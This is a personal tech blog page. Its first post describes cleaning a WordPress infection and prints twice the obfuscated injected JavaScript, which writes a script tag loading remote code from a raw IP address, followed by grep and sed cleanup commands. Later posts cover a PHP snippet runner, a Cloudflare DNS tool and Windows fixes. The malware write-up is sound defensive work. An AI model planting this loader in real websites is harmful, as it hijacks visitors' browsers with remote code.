Technology | Mahdi Hazaveh

removing wordpress malware infecting js files.

A recent WordPress malware is targeting WordPress websites by injecting a piece of malicious code into every single JavaScript files (mostly libraries specially Jquery) which acts maliciously by redirecting the visitors to advertising affiliate sites.

Example injected code:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

Well I came to know about this when a client approached me to clean his hacked website. after looking for this pattern within the files on his WordPress directory I came to find that over 600 Javascript files were injected with the code above.

I have gotten the above result by doing a grep in the public_html folder. following command was used to do a recursive grep looking for matching malicious variable name:

grep -rnw . -e '_0xaae8'

1	grep -rnw . -e '_0xaae8'

looking at the above commands result I found a file named db.php was uploaded to one of the plugins folder which a simple get request to that php file would case of that mass injection to all javascript files.

now lets get rid of the bad stuff in all files by using sed in combination of grep command as below:

grep -rl  '_0xaae8' . | xargs sed -i 's/var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))/ /g'

grep -rl '_0xaae8' . | xargs sed -i 's/var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))/ /g'

This will remove the pattern from each single file that contains it.

Incoming search terms:

https://hazaveh net/2017/02/removing-wordpress-malware-infecting-js-files/
https://yandex ru/clck/jsredir?from=yandex ru;search;web;;&text=&etext=1835 CiGfGuU2ao40SDvubJnd7_lcxMapruAOWD5LCQYPHAV7Uc7AV5I4ZenAYXrIXHjv d0dfbc0346dbc9792fe15682ba7fe380cdb66c6a&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXme
var _0xaae8=[ \x6A\x6F\x69\x6E \x72\x65\x76\x65\x72\x73\x65 \x73\x70\x6C\x69\x74
\x34\x32\x2E
_0xaae8 database

Run PHP codes on the fly using phpExec

phpExec is a small tool I did to execute php snippets on the fly. Basically it is like jsfiddle for php which should be hosted by yourself.

phpExec is a simple script written in php which provides an in-browser editor to write and run php codes. the only requirement would be having php binaries on your machine. you can either use the built in php server functionality shipped with phpExec or place the copy in your web server folder and access it locally.

with phpExec you do not have any limitation on which functions that you can use, so you can even kill your machine with your code if you wish to.

Up and running phpExec:

To get started with phpExec simply download the repository in github and run composer install within the folder to download the required dependencies.

Once you have the folder downloaded you can place it on your local webserver and go to phpExec editor without any additional configuration.

While that would be the fastest way to up and run phpExec, you also could use the phpexec command line utility to run the app on php built-in server.

Running phpexec on the built-in web server would let you to modify the php.ini variables easily by editing the file shipped in the root folder of the project.

to start try running:

php phpexec

1	php phpexec

to run phpexec on the built in server simply use the command

php phpexec serve

1	php phpexec serve

This will run phpExec on localhost:8000 by default. as an additional argument you can pass host and port number to the serve command.

php phpexec serve --host=sandbox.dev --port=8081

1	php phpexec serve --host=sandbox.dev --port=8081

you can also use includes in phpExec. running phpexec make:include command will create a folder and a file within the root directory named as includes/ & includes.php.

once this is done you can add any custom class or php files in the includes folder and reference them in the includes.php .

Also remember symfony var_dumper is already loaded with the page. you can use the dump function anytime within your snippets.

phpexec official page | phpexec github page

Search and replace IP addresses in CloudFlare

So I had to search between more than 700 dns records in our cloudflare account and update the IP addresses to the new servers, out of this task I came up with this tiny application I did in PHP that allows you to search all your cloudflare accounts for an specific IP address and then replace them with the new IP address.

It uses the cloudflare API. It also uses background processes since the process may take long time.

You can download this tiny app from my github. You need to have php installed and a webserver to show the files. of course you can just use it with the PHP built in web server.

To get started open the includes.php file and enter your cloudflare API and email credentials and then launch the app.

By clicking on replace button the application will only lookup your cloudflare and find the changes and shows them to you as a dry run and once you confirm the changes it will do the changes in the background.

Hope it helps some of you peeps out there.

Cortana is missing after Windows 10 Anniversary Update

cortana missing anniversary update Other than the bash one of the most exciting things for me in Anniversary update of Windows 10 was the Android Notification Sync feature, so before even my update completes I already had cortana installed on my Moto X Pure edition.

But Oddly after update Cortana was gone, With no option to enable it. Searching for it online resulted that Microsoft is aware of in this issue and they are working on an update to fix. But there was a quick fix posted in Microsoft Forums which I’m gonna show you today, and Yup, Its Registry Again!

Open Registry editor, Type regedit in the search box to get there.
Navigate to “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search” .
Find the Key BingSearchEnabled, Double click on it and change its value to 1.
Find the Key CortanaEnabled and Double click on it and change its value to 1 as well.

Thats it. click on cortana and you should be able to see her greetings again. “Hi! How can I help?”

Incoming search terms:

Cortana dissapeared
cortana for htc chacha
cortana missing

Fix: Surface Pro 3 Randomly Ejects Micro SD Card

I bought a 64GB Samsung Micro SD card for my Surface Pro 3 around 2 months ago and used it for all my static files, cloud drives and etc. around 2 weeks ago I encountered this issue that the micro sd card was being ejected and reinserted into the machine randomly. This was annoying because Onedrive and my other apps were complaining that the directory is not accessible.

After looking up over the similar problem online I found out that many others are experiencing the same issue with their surface pro 3 and micro sd cards.

Seems like that the latest Realtek Drivers is causing this issue. The only way to solve this issue for now is to remove these drivers from your machine and run an windows update.

After that you should reboot your machine, by doing that windows will again try to download the latest drivers which are faulty. but then you can go to device manager and use “Roll Back Driver” function. this will revert it to the old driver and prevents the automatic updates to replace it with the faulty ones.

So lets go through the steps of doing this a bit more detailed:

Go to Device Manager and under “Universal Serial Bus Controllers” Uninstall the realtek card reader driver.
Restart your machine and then run Windows update.
Go back to Device manager and find the same driver and go to “Properties”.
Click on Driver tab and then click on the button “Roll Back Driver”.

This should fix the driver issue. it is been around 4 days passed since when I applied this remedy and ever since that my SD Card issues are completely resolved.

Incoming search terms:

sd drive missing after sleep
surface pro 3 keeps losing sd card
surface 3 problem with sd card
surface 3 pro sleep sd
surface 3 micro sd problem
windows 10 surface 3 sdcard dissappears
sd card unmounts surface pro 3
microsoft surface pro micro sd card randomly ejects
micro sd card keeps dismounting surface pro 3
i ejected sd card and now cannot see on surface pro 3

M	T	W	T	F	S	S
« Sep
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30
31